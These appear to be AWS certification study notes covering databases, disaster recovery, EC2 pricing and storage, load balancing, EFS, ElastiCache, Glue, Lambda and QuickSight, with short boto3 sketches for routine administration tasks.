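Here is a hedged sketch of generating a CloudFront signed URL with botocore's CloudFrontSigner. The distribution domain, object path, key-pair ID, and private-key file are placeholders; the private key must correspond to a public key registered with the distribution.

```python
import datetime

from botocore.signers import CloudFrontSigner
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding


def rsa_signer(message: bytes) -> bytes:
    # Sign the policy with the CloudFront private key (placeholder file).
    with open("cloudfront_private_key.pem", "rb") as f:
        key = serialization.load_pem_private_key(f.read(), password=None)
    return key.sign(message, padding.PKCS1v15(), hashes.SHA1())


signer = CloudFrontSigner("K1ABCDEFGHIJKL", rsa_signer)  # placeholder key-pair ID

# URL is valid for one hour.
signed_url = signer.generate_presigned_url(
    "https://d111111abcdef8.cloudfront.net/private/video.mp4",
    date_less_than=datetime.datetime.utcnow() + datetime.timedelta(hours=1),
)
print(signed_url)
```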

What is a Database ?



  • A database is a data store that stores semi-structured and structured data
  • A database is a more complex store because it requires formal design and modeling techniques
  • Database types:
    • Relational Database
      • Structured data represents tabular data (tables, rows and columns)
    • Non-Relational Database
      • Semi-Structured that may or may not represent tabular data
  • Set of functionality:
    • query
    • modeling strategies to optimize retrieval for different use cases
    • control over the transformation of the data into useful data structures or reports

What is Data Warehouse ?


  • A relational database designed for analytic workloads; a column-oriented data store
  • Companies will have terabytes and millions of rows of data
  • Data warehouses generally perform aggregation
    • aggregation is grouping data, eg. finding a total or average
    • Data warehouses are optimised around columns since they need to quickly aggregate column data
  • Data warehouses are generally designed to be HOT
    • HOT means they can return queries very fast even though they hold vast amounts of data
  • Data warehouses are infrequently accessed
    • they are not intended for real-time reporting, but might be queried once or twice a day or once a week to generate business or user reports
  • Data Warehouse needs to consume data from a relational database on a regular basis

What is a Key Value Store ?


  • A key-value database is a type of non-relational database (NoSQL) that uses a simple key-value method to store data
    • Stores a unique key alongside a value
    • The database interprets this data much like a dictionary
    • The data can resemble tabular data, but it does not have to have consistent columns per row
    • Due to this simple design, key-value stores can scale well beyond a relational database

What is a document database ?


  • Document store - a NOSQL database that stores documents as its primary data-structure
    • documents could be XML but are more commonly JSON or JSON-like

    • they are a sub-class of key/value stores


NOSQL Database Services


  • DynamoDB

    • a serverless NOSQL key/Value and document database
    • designed to scale to billions of records with data returned consistently at single-digit millisecond latency
    • It is AWS’s flagship database service meaning it is cost-effective and very fast
    • DAX cluster for read cache, microsecond read latency
    • Event Processing: DynamoDB Streams to integrate with AWS Lambda, or Kinesis Data Streams
    • Global Table feature: active-active setup
    • Automated backups up to 35 days with PITR (restore to new table), or on-demand backups
    • Export to S3 without using RCU within the PITR window, import from S3 without using WCU
    • Great to rapidly evolve schema
    • It is a massively scalable database
    • Use cases: serverless application development (small documents, 100s of KB), distributed serverless cache
  • DocumentDB

    • A NOSQL document database that is “MongoDB compatible”
    • MongoDB is a very popular NoSQL database among developers. There were open-source licensing issues around using open-source MongoDB, so AWS got around them by building their own MongoDB-compatible database
    • Use it when you want a MongoDB database
  • Amazon Keyspaces

    • A fully managed Apache Cassandra database
    • Cassandra is an open-source NoSQL key/value database similar to DynamoDB in that it is a columnar store database, but it has some additional functionality
    • Use it when you want to use Apache Cassandra

Relational Database Service


  • Relational Database Services (RDS)

    • supports multiple SQL engines
    • Relational is synonymous with SQL and Online Transactional Processing (OLTP)
    • most commonly used type of database among tech companies and start ups
    • RDS supports the following SQL Engines:
      • MySQL - Most popular open-source SQL database, which was purchased and is now owned by Oracle
      • MariaDB - When Oracle bought MySQL, a fork (copy) of MySQL was made under a different open-source license and named MariaDB
      • Postgres (PSQL) - Most popular open-source SQL database among developers. Has richer features than MySQL but at added complexity
      • Oracle - Oracle’s proprietary SQL database. Well used by enterprise companies. You have to buy a license to use it
      • Microsoft SQL Server - Microsoft’s proprietary SQL database. You have to buy a license to use it
      • Aurora - Fully managed database
        • Aurora
          • fully managed database
          • compatible with either MySQL (5x faster) or PostgreSQL (3x faster)
          • When you want a highly available, durable, scalable and secure relational database for Postgres or MySQL, then Aurora is the correct fit
      • Aurora Serverless - a serverless, on-demand version of Aurora. Use it when you want “most” of the benefits of Aurora but can tolerate cold starts or don’t have a lot of traffic demand
      • RDS on VMware - allows you to deploy RDS-supported engines to an on-premises data center. The data center must be using VMware for server virtualization. Use it when you want databases managed by RDS in your own data center

Other Database Services


  • RedShift
    • petabyte-size data-warehouse
    • Data warehouses
      • are for Online Analytical Processing (OLAP)
      • can be expensive because they are keeping data “hot”
      • “HOT” means we can run a very complex query over a large amount of data and get results back very fast
      • Usage: when you want to quickly generate analytics or reports from a large amount of data
  • ElastiCache
    • a managed version of the in-memory, caching open-source databases
    • Redis or Memcached
    • Usage: when you want to improve the performance of an application by adding a caching layer in front of a web server or database
  • Neptune
    • a managed graph database
    • Data is represented in interconnected nodes
    • Usage: when you need to understand the connections between data eg. Mapping Fraud Rings or Social Media Relationships
  • Amazon Timestream
    • a fully managed time series database
    • Suited to devices that send lots of time-sensitive data, such as IoT devices
    • Usage: when you need to measure how things change over time
  • Amazon Quantum Ledger Database
    • a fully managed ledger database that provides transparent, immutable and cryptographically verifiable transaction logs
    • Usage: when you need to record history of financial activities that can be trusted
  • Database Migration Service
    • a database migration service
    • Can migrate from:
      • On-premise database to AWS
      • between two databases in the same or different AWS accounts, running SQL engines
      • from a SQL to NOSQL database

Disaster Recovery

Disaster Recovery in AWS


  • Any event that has a negative impact on a company’s business continuity or finances is a disaster

  • Disaster recovery (DR) is about preparing for and recovering from a disaster

  • What kind of disaster recovery?

    • On-premise => On-Premise: traditional DR and very expensive
    • On-Premise => AWS cloud: hybrid recovery
    • AWS Cloud Region A => AWS Cloud Region B
  • Disaster Recovery Strategies

    • Backup and Restore

      • High RPO

      • Cheap

      • Easy to implement

    • Pilot Light

      • small version of the app is always running in the cloud
      • Useful for the critical core components of the application (Pilot Light)
      • Very similar to Backup and Restore
      • Faster than Backup and Restore as critical systems are already up
    • Warm Standby

      • Full system is up and running, but at minimum size
      • Upon disaster we can scale to production load
    • Hot Site/ Multi Site Approach

      • Very low RTO (minutes or seconds) - very expensive
      • Full production scale is running on AWS and on-premises

Database Migration Service

  • Supports heterogeneous and homogeneous migrations
  • You must create an EC2 instance to perform the replication tasks
  • Sources can be on-prem databases or EC2-based databases, Azure SQL Databases, Amazon RDS, Amazon S3, and DocumentDB
  • Targets can be on-prem databases, Amazon RDS, Redshift, DynamoDB, OpenSearch, Redis, Babelfish, DocumentDB, etc.
  • AWS Schema Conversion Tool (SCT) can convert the database schema from one engine to another if you are migrating to a different database engine

Continuous Replication

Multi-AZ Deployment

  • When Multi-AZ is enabled, DMS provisions and maintains a synchronous standby replica in a different AZ
    • Advantages:
      • Provide Data Redundancy
      • Eliminates I/O freezes
      • Minimizes latency spikes

RDS to Aurora Migration

  • Options:
    • Snapshot RDS and migrate to Aurora
    • Create an Aurora Read Replica from RDS MySQL and, when the replication lag is 0, promote it as its own DB cluster
    • If MySQL is external to RDS, you can backup with Percona XtraBackup and import into Aurora
    • Use DMS if both databases are up and running

On-premise Strategies

  • You can download the Amazon Linux ISO and run it on on-prem hypervisors
  • Import/export VMs from on-prem to AWS
  • Use AWS Application Discovery Service to gather info about on-prem VMs and plan a migration
    • Track with AWS migration hub
    • Agentless Discovery
      • VM inventory, configuration, performance history, etc.
    • Agent-Based Discovery
      • System configuration, system performance history, running processes, network connection details, etc.
    • Use Application Migration Service (MGN) to lift-and-shift VMs to AWS
  • AWS Database Migration Service
    • Migrate data across database engines
    • Migrate databases from on-prem to AWS
  • AWS Server Migration
    • Incremental replication of on-prem servers to AWS
    • Converts on-prem servers to cloud-based servers

AWS Backup

  • Fully managed
  • Centrally manage and automate backups across all AWS services
  • AWS Backup supports cross-region backups and cross-account backups
  • Backup policies are known as Backup Plans
  • Vault Lock is used to enforce a Write-Once-Read-Many policy (WORM) to ensure backups in the Vault cannot be deleted. Even the root user cannot delete backups when enabled.

Disaster-recovery-cheatsheet

  • Backup
    • EBS Snapshots, RDS automated backups/ Snapshots etc
    • Regular pushes to S3/ S3 IA/ Glacier, Lifecycle Policy, Cross Region Replication
    • From on-premises: Snowball or Storage Gateway
  • High availability
    • Use Route 53 to migrate DNS over Region to Region
    • RDS Multi-AZ, ElastiCache Multi-AZ, EFS, S3
    • Site to Site VPN as a recovery from Direct Connect
  • Replication
    • RDS Replication (Cross Region),AWS Aurora + Global Databases
    • Database replication from on-premise to RDS
    • Storage Gateway
  • Automation
    • CloudFormation / Elastic Beanstalk to re-create a whole new environment
    • Recover / reboot EC2 instances with CloudWatch alarm actions if health checks fail
    • AWS Lambda functions for customized automations
  • Chaos
    • Netflix has a “simian-army” randomly terminating EC2

Savings Plan

  • Get a discount based on long term usage
  • Commit to a certain amount of usage

Spot Instances

  • Up to 90% discount
  • Specify a max price you are willing to pay for your instances. If the spot price goes above your max price, you lose the instance
  • The MOST cost-efficient instance pricing
  • Useful for workloads that are resilient to failure (batch jobs, etc.)

Dedicated Hosts

  • A physical server with EC2 instance capacity dedicated to your use
  • Allows you to address compliance or licensing requirements
  • The most expensive option in AWS
  • Purchasing Options
    • On-demand
    • Reserved Instances

Dedicated Instances

  • Instances run on hardware dedicated to you
  • You may share hardware with other instances in the same account
  • No control over instance placement.

Reserved Instances (RI)

  • Designed for applications that have a steady state, predictable usage or require reserved capacity.
  • Reduced Pricing is based on Term x Class Offering x Payment Option
    • Term

      • {The longer the term the greater the savings}
      • Commit to 1 year or 3 Year contract
      • Reserved Instances do not renew automatically
      • When it expires, the instance keeps running at on-demand pricing with no interruption to service
    • Class

      • {The less flexible the greater savings}
      • Standard
        • Up to 75% reduced pricing compared to on-demand
        • Can modify RI attributes
      • Convertible
        • Up to 54% reduced pricing compared to on-demand
        • Can exchange the RI for another RI of greater or equal value, based on RI attributes
      • Scheduled
        • AWS no longer offers Scheduled RI
    • Payment Options

      • {The greater upfront the greater savings}
      • All Upfront: full payment at the start
      • Partial Upfront: a portion of the cost must be paid up front and the remaining hours are billed at a discounted hourly rate
      • No Upfront: billed at a discounted hourly rate for every hour within the term, regardless of whether the Reserved Instance is being used
    • RIs can be shared between multiple accounts within AWS organization
    • Unused RIs can be sold in the Reserved Instance Marketplace

Reserved Instance (RI) Attributes

  • RI attributes
    • are limited based on class offering and can affect the final price of an RI instance
    • 4 RI attributes:
      • Instance Type:
        • eg. m4.large. This is composed of the instance family (for example, m4) and the instance size (for example, large)
      • Region:
        • The region in which the Reserved Instance is purchased
      • Tenancy:
        • Whether your instance runs on shared(default) or single-tenant (dedicated) hardware
      • Platform:
        • the operating system eg. Windows or Linux/Unix

Regional and Zonal RI

  • Regional RI: purchased for a Region
    • Does not reserve capacity
    • RI discount applies to instance usage in any AZ in the Region
    • RI discount applies to instance usage within the instance family, regardless of size (instance size flexibility is only supported on Linux/Unix Reserved Instances with default tenancy)
    • You can queue purchases for regional RIs
  • Zonal RI: purchased for an Availability Zone
    • Reserves capacity in the specified Availability Zone
    • RI discount applies to instances in the selected AZ (no AZ flexibility)
    • No instance size flexibility; the RI discount applies to instance usage for the specified instance type and size only
    • You can’t queue purchases for zonal RIs

RI Limits


  • There is a limit to the number of Reserved Instances that you can purchase per month
    • Per month you can purchase
      • 20 Regional Reserved Instances per Region
      • 20 Zonal Reserved Instances per AZ
  • Regional limits
    • You cannot exceed your running On-Demand Instance limit by purchasing regional Reserved Instances. The default On-Demand Instance limit is 20.
    • Before purchasing an RI, ensure your On-Demand limit is equal to or greater than the RIs you intend to purchase.
  • Zonal limits
    • You can exceed your running On-Demand Instance limit by purchasing zonal Reserved Instances.
    • If you already have 20 running On-Demand Instances and you purchase 20 zonal Reserved Instances, you can launch a further 20 On-Demand Instances that match the specifications of your zonal Reserved Instances.

Capacity Reservations

  • EC2 instances are backed by different kind of hardware, and so there is a finite amount of servers available within an Availability Zone per instance type or family
  • You might go to launch a specific type of EC2 instance only to find AWS has run out of that kind of server in that location
  • Capacity Reservations are an EC2 feature that allows you to reserve EC2 instance capacity for a specific instance type in a specific Region and AZ

Standard vs Convertible RI

  • Standard RI
    • RI attributes can be modified:
      • Change the AZ within the same Region
      • Change the scope from Zonal RI to Regional RI or vice versa
      • Change the instance size (Linux/Unix only, default tenancy)
      • Change the network from EC2-Classic to VPC and vice versa
    • Can’t be exchanged
    • Can be bought or sold in the RI Marketplace
  • Convertible RI
    • RI attributes can’t be modified (you perform an exchange instead)
    • Can be exchanged during the term for another Convertible RI with new RI attributes, including: instance type, instance family, platform, scope and tenancy
    • Can’t be bought or sold in the RI Marketplace

RI Marketplace

  • EC2 Reserved Instance Marketplace allows you to sell your unused Standard RI to recoup your RI spend for RI you do not intend or cannot use

  • Reserved Instances can be sold after they have been active for at least 30 days and once AWS has received the upfront payment (if applicable)

  • You must have a US bank account to sell Reserved Instances on the Reserved Instance Marketplace

  • There must be at least one month remaining in the term of the Reserved Instance you are listing

  • You will retain the pricing and capacity benefit of your reservation until it’s sold and the transaction is complete

  • Your company name ( and address upon request) will be shared with the buyer for tax purposes.

  • A seller can set only the upfront price for a Reserved Instance. The usage price and other configuration (eg. instance type, availability zone, platform) will remain the same as when the Reserved Instance was initially purchased

  • The term length will be rounded down to the nearest month. For example, a reservation with 9 months and 15 days remaining will appear as 9 months on the Reserved Instance Marketplace.

  • You can sell up to $20,000 in Reserved Instances per year. If you need to sell more Reserved Instances, you must request a sales limit increase from AWS

  • Reserved Instances in the GovCloud region cannot be sold on the Reserved Instance Marketplace

EC2

  • EC2 is not just virtual machines, it consists of VMs, EBS, EIP, ENI, etc.
  • Use user-data to run a script at launch. This script is only run once at the instance’s first start and runs as root
  • t2.micro is part of the free tier

EC2 Instance Types

  • General Purpose (t)
  • Compute Optimized (c)
  • Memory Optimized (r)
  • Storage Optimized (i,d,h1)

Security Groups

  • Security Groups are like a firewall for EC2 instances
  • Security groups only contain allow rules
  • Security groups are stateful. Meaning if we have an inbound allow rule, we don’t need a corresponding outbound allow rule
  • For the source of the traffic, Security Groups can reference an IP address, other security groups, and prefix lists
  • Security Groups and VMs have a many-to-many relationship

Ports to know for the exam

  • 21 = FTP
  • 22 = SSH / SFTP
  • 80 = HTTP
  • 443 = HTTPS
  • 3389 = RDP
  • 5432 = PostgreSQL
  • 3306 = MySQL
  • 1521 = Oracle RDS
  • 1433 = MSSQL
  • 3306 = MariaDB

Placement Groups

  • Use Placement Groups when you want to control how your EC2 instances are scheduled on underlying infrastructure
  • Placement Group strategies
    • Cluster
      • Schedules EC2 instances into a low-latency group in a single Availability Zone
      • Use cases:
        • Big Data job that needs to complete fast
        • Application that needs extremely low latency and high network throughput
    • Spread
      • Pros:
        • Can span across Availability Zones (AZ)
        • Reduced risk of simultaneous failure
        • EC2 instances are on different physical hardware
      • Cons:
        • Limited to 7 instances per AZ per placement group
      • Use cases:
        • Application that needs to maximize high availability
        • Critical Applications where each instance must be isolated from failure from each other
    • Partition
      • Spreads instances across many different partitions (which rely on sets of racks) within an AZ. Scales to 100s of EC2 instances per group

Elastic Network Interfaces

  • The ENI can have the following attributes:
    • Primary private IPV4, one or more secondary IPv4
    • One Elastic IP (IPv4) per private IPv4
    • One or more Security Groups
    • A MAC address
  • You can create ENIs independently and attach them on the fly (move them) to EC2 instances for failover
  • Bound to a specific availability zone (AZ)
  • You can change the Termination Behavior so that if a VM is deleted the attached ENI is/isn’t deleted with it

Spot Instances

  • Up to 90% discount
  • Specify a max price you are willing to pay for your instances. If the spot price goes above your max price, you have two options:
    • You get a two-minute grace period
    • Within it, you can stop the instance or terminate the instance
  • If you don’t want AWS to reclaim the capacity, you can use a Spot Block to block AWS from reclaiming the instance for a specified time frame (1-6 hours)
  • The MOST cost-efficient instance pricing
  • Useful for workloads that are resilient to failure (batch jobs, etc.)
  • Persistent vs. One-Time Spot Requests. With a persistent spot request, if an instance is terminated, it will be restarted. With a one-time spot request, if an instance is terminated, it will NOT be restarted.
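
A minimal boto3 sketch of launching a one-time Spot Instance via run_instances; the AMI ID, instance type, and max price are placeholders.

```python
import boto3

ec2 = boto3.client("ec2")

# Launch one t3.micro as a one-time Spot Instance with a max price cap.
response = ec2.run_instances(
    ImageId="ami-0123456789abcdef0",   # placeholder AMI
    InstanceType="t3.micro",
    MinCount=1,
    MaxCount=1,
    InstanceMarketOptions={
        "MarketType": "spot",
        "SpotOptions": {
            "MaxPrice": "0.01",                      # USD per hour
            "SpotInstanceType": "one-time",
            "InstanceInterruptionBehavior": "terminate",
        },
    },
)
print(response["Instances"][0]["InstanceId"])
```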

Spot Fleets

  • Get a set of spot instances + On-Demand instances
  • Strategies
    • Lowest Price: Spot Fleet will launch instances from the pool with the lowest price
    • Diversified: distributed across all pools
    • capacityOptimized: pool with optimal capacity for the number of instances
    • priceCapacityOptimized: Pools with highest capacity available, then select the pool with the lowest price

Elastic IPs

  • When you stop and start an EC2 instance, its public IP can change; an Elastic IP gives you a fixed public IPv4 address for the instance
  • You can only have 5 Elastic IP addresses in your AWS account by default. You can ask AWS to increase this limit.
  • Try to avoid using EIP

EC2 Hibernate

  • Store the RAM on disk when the OS is stopped.
  • Faster startup
  • The root EBS volume must be encrypted and it must have enough space to store the contents of RAM
  • Instance RAM size must be less than 150GB
  • Does not work for bare metal instances

EBS

  • Bound to an AZ
  • Can be attached/detached from instances on the fly
  • io1/io2 EBS volumes can be attached to multiple instances in the same AZ using ‘multi-attach’
    • Up to 16 instances at a time can be attached to a volume
  • You can move an EBS volume across AZs by creating a snapshot and restoring it in another AZ (copy the snapshot to another region to move across regions)
  • Snapshots
    • You can move a snapshot to an ‘archive tier’ that is 75% cheaper
    • Takes 24 to 72 hours to restore the snapshot from the archive
    • Recycle Bin
      • You can setup rules to retain deleted snapshots so you can easily recover them
      • Specify a retention for the recycle bin (from 1 day to 1 year)
    • Fast Snapshot Restore (FSR)
      • Force full initialization of your snapshot to have no latency on first use.
      • Expensive to use
  • Encryption
    • data at rest and data in motion are both encrypted
    • all snapshots are encrypted
    • Copying an unencrypted snapshot allows you to enable encryption on the copy
    • How to encrypt an unencrypted volume
      1. Create a snapshot of the volume
      2. Encrypt the snapshot using the copy function
      3. Create new EBS volume from the snapshot (the volume will be encrypted)
      4. Attach the encrypted volume to the original instance
  • Root volumes are automatically deleted (the Delete on Termination attribute) when an EC2 instance is terminated. Other EBS volumes attached to the instance are not deleted unless their attribute says to delete them on termination of the EC2 instance.
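
The four-step procedure above for encrypting an unencrypted volume can be scripted with boto3 roughly like this; the volume ID, Region, and AZ are placeholders, and the final attach step is only noted in a comment.

```python
import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")

# 1. Snapshot the unencrypted volume (placeholder volume ID).
snap = ec2.create_snapshot(VolumeId="vol-0123456789abcdef0")
ec2.get_waiter("snapshot_completed").wait(SnapshotIds=[snap["SnapshotId"]])

# 2. Copy the snapshot with encryption enabled (default KMS key).
copy = ec2.copy_snapshot(
    SourceSnapshotId=snap["SnapshotId"],
    SourceRegion="us-east-1",
    Encrypted=True,
)
ec2.get_waiter("snapshot_completed").wait(SnapshotIds=[copy["SnapshotId"]])

# 3. Create a new, encrypted volume from the encrypted snapshot.
volume = ec2.create_volume(
    SnapshotId=copy["SnapshotId"],
    AvailabilityZone="us-east-1a",
)
# 4. Attach the encrypted volume to the instance with attach_volume(...).
```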

EC2 Instance Store

  • Ephemeral storage
  • High performance
  • Use cases:
    • buffer
    • cache
  • Data is lost when the EC2 instance is stopped or terminated, or the underlying hardware fails (data survives a reboot)

AMI

  • VM Image
  • Locked to a region, but can be copied across regions
  • Types of AMIs:
    • Public (AWS Provided)
    • Private (created by you)
    • MarketPlace (3rd party vendor)

EBS Volume Types

  • Types:

    • gp2/gp3 (SSD): General purpose SSD volume. Balance price and performance
    • io1/io2 Block Express (SSD): Highest performance SSD volume for mission-critical low-latency or high-throughput workloads
    • st1 (HDD): Low cost HDD volume designed for frequently accessed, throughput-intensive workloads
      • Cannot be a boot volume
      • 125GB to 16 TB
    • sc1 (HDD): Lowest cost HDD volume designed for less frequently accessed workloads
  • Only gp2/gp3 and io1/io2 can be used as boot volumes

  • With GP3, you can independently set IOPS and throughput. With GP2, they are linked together

Provisioned IOPS

  • Provisioned IOPS volumes are used for critical business applications with sustained IOPS performance
  • Great for database workloads
  • io1 Provisioned IOPS:
    • If you want more than 32,000 IOPS, you need an EC2 Nitro-based instance with io1 or io2

Auto Scaling Group (ASG)

  • Automatically scale out EC2 instances to meet traffic demand. You can scale based on a CloudWatch alarm (metric), a schedule, or predicted demand
  • Set a minimum capacity, desired capacity, and max capacity
  • The ASG itself is free
  • Create a launch template, which specifies how to launch instances within the ASG
  • Scaling Policies
    • Dynamic Scaling
      • Target Tracking Scaling
        • Simple, example: keep CPU usage around 50%
        • Target Tracking will create CloudWatch Alarms for you
      • Simple / Step Scaling
        • When a CloudWatch Alarm is triggered, add 2 instances
    • Scheduled Scaling
      • Scale based on a schedule
    • Predictive Scaling
      • Forecast load and scale ahead of time
  • Scaling cooldown (default 300 seconds): the ASG will not launch or terminate additional instances during the cooldown period
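
A minimal boto3 sketch of the target-tracking policy described above (keep average CPU around 50%); the ASG name is a placeholder and the group is assumed to already exist.

```python
import boto3

autoscaling = boto3.client("autoscaling")

# Target tracking: Auto Scaling creates the CloudWatch alarms for you
# and adds/removes instances to keep average CPU near 50%.
autoscaling.put_scaling_policy(
    AutoScalingGroupName="web-asg",            # placeholder ASG name
    PolicyName="keep-cpu-at-50",
    PolicyType="TargetTrackingScaling",
    TargetTrackingConfiguration={
        "PredefinedMetricSpecification": {
            "PredefinedMetricType": "ASGAverageCPUUtilization"
        },
        "TargetValue": 50.0,
    },
)
```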

Elastic Load Balancer

  • Spread load of traffic across multiple downstream instances
  • Health check downstream instances

  • SSL Termination
  • High Availability across zones
  • Add backend instances to a “Target Group”

Types of ELB

  • Application Load Balancer (Layer 7)

    • Allows you to route to multiple instances in a Target Group (aka Backend Pool in Azure)
    • Supports HTTP/2 and websocket
    • Route based on the path in the URL, hostname, query strings, and headers
    • Extra headers added by ALB
      • x-forwarded-for
      • x-forwarded-proto
      • x-forwarded-port
    • ALB has a WAF capability that can be enabled
  • Network Load Balancer (Layer 4)

    • High performance, millions of requests per second, and less latency ~100 ms
    • NLB has one static IP address per AZ, and supports assigning an Elastic IP
    • Not included in the free tier
  • Gateway Load Balancer (Layer 3)

    • Use cases: Send all traffic to a firewall, IDS, IPS, etc.
    • Supports the GENEVE protocol on port udp/6081

Sticky Sessions

  • Same client is forwarded to the same instance, rather than spreading traffic amongst all instances
  • Supported by the ALB and NLB
  • A cookie is set on the client which has an expiration date you control
    • Cookies:
      • Two types of cookie are supported:
        • Application Based Cookie:
          • Custom cookie:
            • Generated by the target
            • Can include any custom attributes required by the application
            • The cookie name must be specified individually per target group
            • You cannot use AWSALB, AWSALBAPP, or AWSALBTG. These are all reserved by AWS
          • Application Cookie:
            • Generated by the LB itself
            • Cookie will be AWSALBAPP
        • Duration-based Cookie
          • Cookie is generated by the load balancer itself
          • Cookie name is AWSALB for ALB

Cross-Zone Load Balancing

  • Each load balancer instance distributes traffic evenly across all registered instances in all AZs
  • For the ALB, cross-zone load balancing can be enabled/disabled at the target group level. It is enabled by default and there are no additional charges
  • Can be enabled for NLB and GLB, but additional charges will apply. It is disabled by default.

SNI

  • Server Name Indication (SNI) lets you serve multiple SSL certificates on the same listener; works with ALB, NLB, and CloudFront

Deregistration Delay

  • AKA Connection Draining
  • Stop sending new requests to the instance that is being deregistered
  • Allows the instance to complete in-flight requests before being terminated
  • 1 to 3600 seconds (default 300 seconds)
  • Can be disabled (set to 0 seconds)
  • Set to a low value if your requests are short-lived

Elastic File System (EFS)

  • Scalable, elastic, Cloud-Native NFS File System
  • Attach a single file system to multiple EC2 Instances
  • Don’t worry about running out or managing disk space

Introduction to Elastic File System (EFS)

  • EFS is a file storage service for EC2 instances
  • Storage capacity grows (up to petabytes) and shrinks automatically based on the data stored (elastic)
  • Multiple EC2 instances in same VPC can mount a single EFS Volume (Volume must be in same VPC)
  • EC2 instances install the NFSv4.1 client and can then mount the EFS volume
  • EFS is using Network File System version 4 (NFSv4) protocol
  • EFS creates multiple mount targets in all your VPC subnets
  • Pay only for the storage you use, starting at $0.30 per GB-month
  • You create a security group to control access to EFS
  • Encryption at rest using KMS
  • 1000s of concurrent NFS clients, 10+ GB/s throughput
  • Grow to petabyte scale storage

EFS Performance Settings

  • Performance Mode
    • General Purpose (Default) - latency sensitive use cases
    • Max IO - higher latency, throughput, highly parallel
  • Throughput Mode:
    • Bursting - 1 TB storage = 50 MB/s + burst up to 100 MB/s
    • Enhanced - Provides more flexibility and higher throughput levels for workloads with a range of performance requirements
      • Provisioned - set your throughput regardless of storage size
      • Elastic - scale throughput up and down based on workload. Useful for unpredictable workloads

EFS Storage Tiers

  • Standard
  • Infrequent (EFS-IA)
  • Archive
  • Implement lifecycle policies to move files between tiers

What is ElastiCache for Redis?

  • ElastiCache is a web service that makes it easy to set up, manage and scale a distributed in-memory data store or cache environment in the cloud.
  • Features:
    • Automatic detection of and recovery from cache node failures
    • Multi-AZ with automatic failover from a failed primary cluster to a read replica in a Redis cluster
    • Redis (cluster mode enabled) supports partitioning your data across up to 500 shards
  • ElastiCache works with both the Redis and Memcached engines.

Comparing Memcached and Redis

  • Redis supports:

    • Multi-AZ with Auto-Failover
    • Read replicas
    • data durability using AOF persistence
    • Backup and restore features
    • Supports sets and sorted sets
      • Sorted sets guarantee both uniqueness and element ordering. Useful when creating something like a gaming leaderboard: each time a new element is added, it is ordered automatically (see the sketch after this list).
    • Supports IAM for authentication
  • Memcached supports:

    • None of what Redis supports
    • Supports SASL based authentication
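For illustration only, a minimal redis-py sketch of the leaderboard idea mentioned above (the endpoint and scores are made up):

    import redis

    # Placeholder ElastiCache for Redis endpoint
    r = redis.Redis(host="my-cluster.abc123.0001.use1.cache.amazonaws.com", port=6379)

    # ZADD keeps members unique and ordered by score automatically
    r.zadd("leaderboard", {"alice": 3100, "bob": 2800, "carol": 3400})
    r.zincrby("leaderboard", 150, "bob")  # bump bob's score to 2950

    # Top 3 players, highest score first
    print(r.zrevrange("leaderboard", 0, 2, withscores=True))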

Authenticating with Redis AUTH command

  • Users enter a token (password) on a token-protected Redis server.
  • Include the parameter --auth-token (API: AuthToken) with the correct token to create the replication group or cluster.
  • Key Parameters (see the sketch after this list):
    • --engine - Must be redis
    • --engine-version - Must be 3.2.6, 4.0.10 or later
    • --transit-encryption-enabled - Required for authentication and HIPAA eligibility
    • --auth-token - Required for HIPAA eligibility. This value must be the correct token for this token-protected Redis server
    • --cache-subnet-group - Required for HIPAA eligibility
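A hedged boto3 equivalent of those CLI flags might look like the sketch below (all names, versions, and the token are placeholders, not values from the original notes):

    import boto3

    elasticache = boto3.client("elasticache")

    elasticache.create_replication_group(
        ReplicationGroupId="my-redis-group",
        ReplicationGroupDescription="Token-protected Redis replication group",
        Engine="redis",                              # --engine
        EngineVersion="6.2",                         # --engine-version (3.2.6, 4.0.10 or later)
        CacheNodeType="cache.t3.micro",
        NumCacheClusters=2,
        CacheSubnetGroupName="my-subnet-group",      # --cache-subnet-group
        TransitEncryptionEnabled=True,               # --transit-encryption-enabled
        AuthToken="correct-horse-battery-staple-1",  # --auth-token
    )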

Glue-cheatsheet

  • A fully managed service to extract, transform and load (ETL) your data for analytics

  • Discover and search across different AWS data sets without moving your data

  • AWS Glue retrieves data from sources and writes data to targets stored and transported in various data formats

    • If your data is stored or transported in the Parquet format, AWS Glue provides features for working with it
  • AWS Glue consists of:

    • Central metadata repository
    • ETL engine
    • Flexible scheduler
  • Use Cases:

    • Run queries against an Amazon S3 data lake
      • You can use AWS Glue to make your data available for analytics without moving your data
    • Analyze the log data in your data warehouse
      • Create ETL scripts to transform, flatten, and enrich the data from source to target
  • Integration with AWS Glue

    • To create database and table schema in the AWS Glue Data Catalog, you can run an AWS Glue crawler from within Athena on a data source, or you can run Data Definition Language (DDL) queries directly in the Athena Query Editor.
    • Then, using the database and table schema that you created, you can use Data Manipulation Language (DML) queries in Athena to query the data.
  • Set up AWS Glue Crawlers using S3 event notifications

AWS Lambda


  • Run code without thinking about servers or clusters
  • Run code without provisioning or managing infrastructure. Simply write and upload code as a .zip file or container image
  • Automatically respond to code execution requests at any scale, from a dozen events per day to hundreds of thousands per second
  • Save costs by paying only for the compute time you use, billed per millisecond, instead of provisioning infrastructure upfront for peak capacity
  • Optimize code execution time and performance with the right function memory size. Respond to high demand in double-digit milliseconds with Provisioned Concurrency.

How it works


  • AWS Lambda is a serverless, event-driven compute service that lets you run code for virtually any type of application or backend service without provisioning or managing servers.
  • You can trigger Lambda from over 200 AWS services and software-as-a-service (SaaS) applications, and only pay for what you use
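As a rough sketch (not from the original notes), the code you upload can be as small as a single handler function; Lambda calls it once per event:

    import json

    def lambda_handler(event, context):
        # 'event' carries the trigger payload (API Gateway request, S3 notification, ...)
        print("Received event:", json.dumps(event))
        # Shape expected by an API Gateway proxy integration
        return {
            "statusCode": 200,
            "body": json.dumps({"message": "Hello from Lambda"}),
        }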

File Processing Architecture



Stream Processing Architecture



Use Cases


  • Quickly process data at scale
    • Meet resource-intensive and unpredictable demand by using AWS Lambda to instantly scale out to more than 18K vCPUs.
    • Build processing workflows quickly and easily with a suite of other serverless offerings and event triggers
  • Run interactive web and mobile backends
  • Enable powerful ML insights
  • Create event-driven applications

Ml-models

What is Amazon QuickSight ?


  • Amazon QuickSight is a very fast, easy-to-use, cloud-powered business analytics service that makes it easy for all employees within an organization to build visualizations, perform ad-hoc analysis, and quickly get business insights from their data, anytime, on any device.
  • 1/10th the cost of traditional BI Solutions
  • With QuickSight all users can meet varying analytic needs from the same source of truth through modern interactive dashboards, paginated reports, embedded analytics and natural language queries

Benefits


  • Pay only for what you use
  • Scale to tens of thousands of users
